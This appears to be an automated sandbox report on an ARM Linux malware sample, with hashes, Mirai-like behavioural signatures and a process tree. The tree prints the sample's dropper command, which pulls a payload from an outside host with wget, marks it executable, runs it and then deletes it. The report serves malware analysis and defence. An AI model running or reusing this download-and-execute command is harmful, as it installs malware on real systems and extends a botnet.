Overview

overview

10

Static

static

10

7448ffe455...0a.elf

debian-9-armhf

7

Analysis

  • max time kernel
    147s
  • max time network
    140s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20221111-en
  • resource tags

    arch:armhfimage:debian9-armhf-20221111-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    31/05/2023, 01:18

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    7448ffe45565ac89bac6bfb853f814e3a08869bec4ad6479fe4282c835e0a50a.elf

  • Size

    139KB

  • MD5

    3f873257c444500f6545a64d98033589

  • SHA1

    0f071b87e35fe8509d4e4e32ee06b7190e6ac1db

  • SHA256

    7448ffe45565ac89bac6bfb853f814e3a08869bec4ad6479fe4282c835e0a50a

  • SHA512

    10af1ce8e04857a1ba3df8aa736e5a851641bc1f0b37405ee93e071961218b37e594db7a3ad6df01e718984b9b213b7eb3d699f610ed343600cb320423beaa11

  • SSDEEP

    3072:Z41HOuaGVV3NfHUOjqyljqCw3jkmhxQwoVZUNu:Ze3aGVVdqyljq1jkmhxQwoVZUNu

Score
7/10

Malware Config

Signatures

  • Changes its process name 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Reads system routing table 1 TTPs 1 IoCs

    Gets active network interfaces from /proc virtual filesystem.

  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/7448ffe45565ac89bac6bfb853f814e3a08869bec4ad6479fe4282c835e0a50a.elf
    /tmp/7448ffe45565ac89bac6bfb853f814e3a08869bec4ad6479fe4282c835e0a50a.elf
    1⤵
    • Changes its process name
    • Reads system routing table
    • Reads system network configuration
    PID:367
    • /bin/sh
      /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
      2⤵
        PID:368
        • /usr/bin/wget
          wget -q http://gay.energy/.../vivid -O .....
          3⤵
          • Writes file to tmp directory
          PID:372
        • /bin/chmod
          chmod 777 .....
          3⤵
            PID:377
          • /tmp/.....
            ./.....
            3⤵
              PID:378
            • /bin/sh
              /bin/sh ./.....
              3⤵
                PID:378
              • /bin/rm
                rm -rf .....
                3⤵
                  PID:380

            Network

                  MITRE ATT&CK Enterprise v6

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads